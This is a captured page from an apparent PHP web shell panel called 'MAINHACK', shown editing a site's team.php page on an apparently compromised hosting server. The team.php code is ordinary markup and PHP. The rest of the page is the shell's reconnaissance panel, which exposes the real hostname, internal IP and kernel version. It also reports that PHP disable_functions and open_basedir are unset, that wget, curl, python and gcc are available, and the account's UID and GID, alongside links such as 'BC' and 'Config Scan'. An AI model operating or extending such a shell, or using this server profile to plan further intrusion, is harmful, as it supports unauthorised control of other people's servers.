[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: team.php
<?php include("header.php"); ?> <!-- // Header include --> <!-- Banner Slider --> <div class="banner-inner"> <img src="images/inner-bannerr02.png" align="About Banner" style="width: 100%;"> <ul> <li><a href="index.php">Home</a></li> <li>/</li> <li><a href="team.php" class="active">Team</a></li> </ul> </div> <!-- // Banner Slider --> <div class="about-trems team"> <div class="container"> <h2 class="title-txt">Our Team <span><i style="background: #fff;">Project Lead</i></span></h2> <div class="team-block" style=" background: #0b54e5; margin: 30px auto 0; padding: 30px; border-radius: 10px; background: linear-gradient(to bottom right, #004cffa3, #1e3a8a, #0e2762); background: linear-gradient(180deg,rgba(6,182,212,.1),transparent); border: 1px solid #cccccc45;"> <div class="row"> <?php $count=1; $sr='team'; $stmt =$show->readwithdata($sr,'id',1); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; //$img=$row['image']==''?"No image found":"<img src='".$pic_img."/".$row['image']."' width='100px'>"; // echo $usr_p; ?> <div class="col-md-9 col-sm-6 col-xm-12" > <p style=""><b><?=$row['name']?></b> <?=htmlspecialchars_decode($row['description'])?> </div> <div class="col-md-3 col-sm-6 col-xm-12" > <img src="<?=$pic_img?>/<?=$row['image']?>"> </div> <?php } } ?> <?php $count=1; $sr='team'; $stmt =$show->readwithdata($sr,'id',2); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; //$img=$row['image']==''?"No image found":"<img src='".$pic_img."/".$row['image']."' width='100px'>"; // echo $usr_p; ?> <div class="col-md-9 col-sm-6 col-xm-12" > <p style=""><b>Implementation Partner</b><b><?=$row['name']?></b> <?=htmlspecialchars_decode($row['description'])?> </div> <div class="col-md-3 col-sm-6 col-xm-12" > <img src="<?=$pic_img?>/<?=$row['image']?>"> </div> <?php } }?> <?php $count=1; $sr='team'; $stmt =$show->readwithdata($sr,'id',3); $num = $stmt->rowCount(); if($num>0){ $count=1; while ($row = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row); $id=$row['id']; //$img=$row['image']==''?"No image found":"<img src='".$pic_img."/".$row['image']."' width='100px'>"; // echo $usr_p; ?> <div class="col-md-9 col-sm-6 col-xm-12" > <p style=""><b><?=$row['name']?></b> <?=htmlspecialchars_decode($row['description'])?> </div> <div class="col-md-3 col-sm-6 col-xm-12" > <img src="<?=$pic_img?>/<?=$row['image']?>"> </div> <?php } }?> </div> </div> <div class="clearfix"> </div> </div> </div> <!-- Header include --> <?php include("footer.php"); ?> <!-- // Header include -->
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.51 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619